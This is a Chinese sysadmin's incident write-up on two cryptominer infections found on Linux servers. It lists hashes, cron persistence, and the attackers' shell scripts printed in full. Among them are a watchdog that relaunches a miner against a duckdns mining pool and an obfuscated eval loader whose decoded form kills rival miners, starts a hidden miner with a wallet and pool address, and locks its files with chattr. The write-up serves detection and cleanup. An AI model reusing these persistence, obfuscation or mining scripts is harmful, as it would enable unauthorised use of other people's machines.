两个挖矿程序特征20190510

  sre

5fc8e1e29895d3613.jpg_fo742.jpg

第一个

发现cpu高占用的进程,其二进制如下:

[root@test1 ~]# md5sum /tmp/.../r64
4ea6af6fa6ebb8bb6c51a6dde637c181  /tmp/.../r64

md5特征:

http://v.virscan.org/language/zh-tw/Win32/Virus.RiskTool.42d.html
http://v.virscan.org/Linux/BitCoinMiner.dypoa.html
http://v.virscan.org/Win32/Virus.RiskTool.42d.html
https://www.scumware.org/report/4EA6AF6FA6EBB8BB6C51A6DDE637C181.html

其他特征:

[root@test1 ~]# crontab -l
* * * * * /tmp/.../upd >/dev/null 2>&1
[root@test1 ~]# md5sum /tmp/.../upd
e5267c19fd2be9c276bf29e35444965f  /tmp/.../upd
[root@test1 ~]# cat /tmp/.../upd
#!/bin/sh
if test -r /tmp/.../bash.pid; then
pid=(cat /tmp/.../bash.pid)
if(kill -CHLD pid >/dev/null 2>&1)
then
sleep 1
else
cd /tmp/...
./run &>/dev/null
exit 0
fi
fi
[root@test1 ~]# ll /tmp/.../bash.pid
-rwxrwxrwx 1 root root 6 May 10 14:07 /tmp/.../bash.pid
[root@test1 ...]# pwd
/tmp/...
[root@test1 ...]# ll
total 960
-rwxrwxrwx 1 root root    329 Mar 13 03:50 a
-rwxrwxrwx 1 root root      6 May 10 14:08 bash.pid
-rw-r--r-- 1 root root     39 May  9 06:33 cron.d
-rw-r--r-- 1 root root      9 May  9 06:33 dir.dir
-rwxrwxrwx 1 root root 496692 Feb 28 13:57 r32
-rwxrwxrwx 1 root root 454196 Mar 12 06:44 r64
-rwxrwxrwx 1 root root    309 Mar 13 03:49 run
-rwxr--r-- 1 root root    173 May  9 06:33 upd
-rwxrwxrwx 1 root root     23 May 14  2018 x
[root@test1 ...]# cat run 
#!/bin/bash

ARCH=`uname -m`


if [ "ARCH" == "i686" ];       then
      ./r32 -o stratum+tcp://miningv2.duckdns.org:1338 -p x -k -B --nicehash >>/dev/null &
elif [ "ARCH" == "x86_64" ];   then
      ./r64 -o stratum+tcp://miningv2.duckdns.org:1338 --nicehash -B -k -p x >>/dev/null &
fi
echo! > bash.pid

[root@test1 ...]# cat cron.d 
* * * * * /tmp/.../upd >/dev/null 2>&1

第二个

二进制路径是/tmp/.,这不点是目录而是二进制,比较迷惑。
定时器:

[root@test2 ~]# cat /tmp/.ssh3
z="
";cBz='a .s';LBz='000+';dz='rgg';nz='Wbwt';Gz='l xs';JBz='m7E5';vz='HkLc';Sz='2';Lz='l xm';WBz='el=3';EBz='2WMu';Fz='ux';Vz='l x6';Pz='l py';Wz='4';QBz='1:55';oz='5ZaQ';UBz='nate';dBz='i ."';xz='82U4';Oz='va';ZBz='tr +';lz='u 45';Xz='rig';Uz='pcd';wz='KMS1';Cz='  "';Hz='l ba';fz=' nsy';CBz='7nDA';IBz='hwHJ';cz='l xo';kz=' " -';Yz='l ss';Rz='l x3';Az='pkil';qz='8Na7';gz='hs';Iz='sh64';mz='z52t';PBz='46e4';yz='vvLq';bBz='sh3';Kz='ft';Mz='32';iz='/." ';eBz='a ."';Dz='l ld';Tz='l dh';VBz='-lev';bz='rn';Zz='hd64';sz='hkWJ';pz='r4yQ';az='l ma';rz='8aRi';NBz='-o 0';MBz='cn2 ';jz='    ';aBz='i .s';HBz='TjA1';Ez='-lin';XBz=' -B';YBz='chat';ABz='yZaD';Nz='l ja';RBz='55 -';tz='JXVP';ez='l -9';SBz='p x ';OBz='x362';hz='/tmp';BBz='eyZR';Bz='l " ';DBz='E3Fp';FBz='tEVE';GBz='9Xwr';Qz='thon';KBz='F.10';Jz='l so';uz='taMe';TBz='--do';
eval "AzBzCzzAzDzEzFzzAzGzzAzHzIzzAzJzKzzAzLzMzzAzNzOzzAzPzQzzAzRzSzzAzTzUzzAzVzWzzAzLzXzzAzYzZzzAzVzWzzAzazbzzAzczdzzAzezfzgzzhzizjzkzlzmznzozpzqzrzsztzuzvzwzxzyzABzBBzCBzDBzEBzFBzGBzHBzIBzJBzKBzLBzMBzNBzOBzPBzQBzRBzSBzTBzUBzVBzWBzXBzzYBzZBzaBzbBzzYBzZBzcBzbBzzYBzZBzdBzjzCzzYBzZBzeBzjz$Cz"
[root@test2 ~]# lsattr /tmp/.ssh3
----ia-------e-- /tmp/.ssh3
[root@test2 ~]# chattr -i -a -e /tmp/.ssh3
[root@test2 ~]# vim /tmp/.ssh3

[root@test2 ~]# bash /tmp/.ssh3

pkill "   "
pkill ld-linux
pkill xs
pkill bash64
pkill soft
pkill xm32
pkill java
pkill python
pkill x32
pkill dhpcd
pkill x64
pkill xmrig
pkill sshd64
pkill x64
pkill marn
pkill xorgg
pkill -9 nsyhs
/tmp/."      " -u 45z52tWbwt5ZaQr4yQ8Na78aRihkWJJXVPtaMeHkLcKMS182U4vvLqyZaDeyZR7nDAE3Fp2WMutEVE9XwrTjA1hwHJm7E5F.10000+cn2 -o 0x36246e41:5555 -p x --donate-level=3 -B
chattr +i .ssh3
chattr +a .ssh3
chattr +i ."      "
chattr +a ."      "

LEAVE A COMMENT

Captcha Code